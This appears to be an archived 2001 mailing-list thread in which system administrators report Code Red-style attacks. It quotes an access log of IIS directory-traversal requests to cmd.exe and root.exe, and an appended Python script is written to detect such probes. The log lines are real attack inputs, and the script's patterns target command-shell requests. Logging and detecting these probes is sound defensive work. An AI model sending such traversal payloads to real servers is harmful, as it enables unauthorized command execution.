[ale] CodeRed attacks, here we go again.

Michael Smith MSmith at webtonetech.com
Tue Sep 18 10:28:26 EDT 2001


Ditto here.  400 hits in 2 hours.  Looks like another Code Red Variant......

Mike

-----Original Message-----
From: Terry Lee Tucker [mailto:terry at esc1.com]
To: ale at ale.org
Sent: Tuesday, September 18, 2001 10:24 AM
To: SAngell at nan.net; ale at ale.org
Subject: Re: [ale] CodeRed attacks, here we go again.


I'm getting hit with the following:

208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304

Obviously, someone is trying to get something from a windoze box.

SAngell at nan.net wrote:
> 
> I am being flooded by Code Red attacks originating from network 205.152.x.x all
> by the variant which is attempting to drop the trojan backdoor on to my servers,
> either root.exe or explorer.exe. This attack is worse than any I have previously
> seen with hundreds of attempts in the last 5 minutes.
> 
> Anyone else witnessing these?
> 
> \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> \_    Steve Angell,  MCSE, CCNA           _/
> \_    MIS Operations Manager               _/
> \_    TSYS Total Debt Management  _/
> \_    Norcross, GA                                   _/
> \_    Phone 770-409-5570                    _/
> \_    Fax      770-416-1752                   _/
> \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> 
> --
> To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.

-- 
Sparta, NC 28675 USA
336.372.6812
http://www.esc1.com
The Gates of hell shall NOT prevail...
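
An added example, not part of the thread: a small Python classifier for the kind of probes in the access-log excerpt above. It flags double percent-encoding (`%255c`), bytes that cannot occur in valid UTF-8 (`%c0`, `%c1`), dot-dot path segments, and requests for `cmd.exe` or `root.exe`; the function names, tag names and client addresses are assumptions, while the request paths are copied from the quoted log.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in Apache common log format. Request paths come from the log
# quoted in the thread; the client addresses are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:10:30:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
192.0.2.10 - - [18/Sep/2001:10:30:31 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
192.0.2.10 - - [18/Sep/2001:10:30:41 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
192.0.2.11 - - [18/Sep/2001:10:31:02 -0400] "GET /index.html HTTP/1.0" 200 1024
"""

# client address, request target, status code
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Return the set of probe tags (hypothetical names) for one request target."""
    raw = target.split("?", 1)[0].encode()
    tags = set()
    # Percent-decode repeatedly; a path that still changes on the second pass
    # was encoded twice (%255c -> %5c -> backslash).
    for depth in range(3):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        if depth >= 1:
            tags.add("double-encoding")
        raw = decoded
    # 0xC0 and 0xC1 never occur in valid UTF-8, so their presence marks a
    # malformed (overlong-style) sequence rather than legitimate text.
    if b"\xc0" in raw or b"\xc1" in raw:
        tags.add("invalid-utf8")
    if re.search(rb"(?:^|[\\/])\.\.", raw):
        tags.add("dot-dot")
    if re.search(rb"(?:cmd|root)\.exe$", raw, re.I):
        tags.add("shell-exe")
    return tags

def scan(log_text):
    """Map each client address to its flagged (target, status, sorted tags) rows."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and (tags := classify(m.group(2))):
            hits[m.group(1)].append((m.group(2), int(m.group(3)), sorted(tags)))
    return dict(hits)

if __name__ == "__main__":
    for ip, rows in scan(SAMPLE_LOG).items():
        print(ip, len(rows), "flagged requests:", rows)
```

The status code is kept in each row so that a flagged request answered with anything other than 404 stands out for follow-up.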